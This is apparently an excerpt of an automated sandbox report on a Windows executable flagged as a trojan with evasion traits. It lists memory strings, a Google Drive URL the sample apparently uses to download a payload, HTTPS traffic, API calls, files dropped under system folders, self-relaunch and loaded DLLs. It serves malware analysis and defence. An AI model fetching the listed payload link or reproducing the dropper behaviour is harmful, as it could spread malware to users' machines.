nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloade
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadid
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadmL
      Source: nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadnt
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadt
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: nRNzqQOQwk.exe, 00000001.00000003.14419575411.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13520406559.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapi
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.15128211863.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531873263.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16703975770.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16138447412.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14307119975.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16815816874.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14904620514.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16250138301.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15691986334.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15803735270.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916696761.00000000067FC000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15362687112.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580308822.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.00000000067F9000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14786084325.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14792916940.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15915220747.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49788 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49794 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49810 version: TLS 1.2
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F7
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Windows\Fonts\prelegacyJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Windows\Fonts\prelegacy\prsterJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004049360_2_00404936
      Source: nRNzqQOQwk.exeStatic PE information: invalid certificate
      Source: nRNzqQOQwk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal72.troj.evad.winEXE@3/7@2/2
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004043C3 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043C3
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Program Files (x86)\Fljtenists.iniJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\slavelivetsJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1A27.tmpJump to behavior
      Source: nRNzqQOQwk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: nRNzqQOQwk.exeVirustotal: Detection: 67%
      Source: nRNzqQOQwk.exeReversingLabs: Detection: 70%
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile read: C:\Users\user\Desktop\nRNzqQOQwk.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: sspicli.dllJump to behavior
